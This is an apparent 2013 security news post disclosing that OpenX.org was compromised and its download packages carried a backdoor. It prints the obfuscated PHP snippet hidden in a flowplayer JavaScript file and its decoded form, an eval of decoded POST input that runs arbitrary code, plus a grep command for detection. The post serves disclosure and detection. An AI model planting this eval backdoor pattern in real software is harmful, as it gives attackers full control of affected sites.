OpenX.org Compromised and Downloads Injected with a Backdoor

We received reports that OpenX.org was compromised and the OpenX download files had a backdoor injected in them. According to Heise (in German), the malicious files were modified around November/2012, and have been undetected since.

It means that if you have downloaded OpenX during the last 7 months, it likely contains a backdoor that could allow the attackers full access to your site. That’s how serious it is.

*The OpenX team have confirmed the breach and removed the bad files from their servers.

OpenX Backdoor

We didn’t get access to the infected package yet, but based on some public sources, the backdoor is hidden inside:

/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js

It can be found by searching for PHP tags inside .js files.

This is what the backdoor looks like:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2'; 
*/$j='ex'./**/'plode'; /* if(this.className ...

If you look close you can see the PHP code mingled with the JavaScript code, which is meant to make it harder to detect.

After decoding it looks like this:

<?php
$j='explode';
$_=$j(",",'strrev,str_rot13,vastPlayer');
eval ( $_[1]($_[0]( $_POST[$_[2]])) );

This allows the attackers to execute any PHP code via the “eval” function.

Here is a simple command to find if your OpenX install has the backdoor:

$ grep -r --include "*.js" '<?php' DIRECTORYWHEREYOURSITEIS

Our team is still investigating the issue, and we will provide more details soon.

Read more: OpenX.org Compromised and Downloads Injected with a Backdoor

Story added 6. August 2013, content source with full text you can find at link above.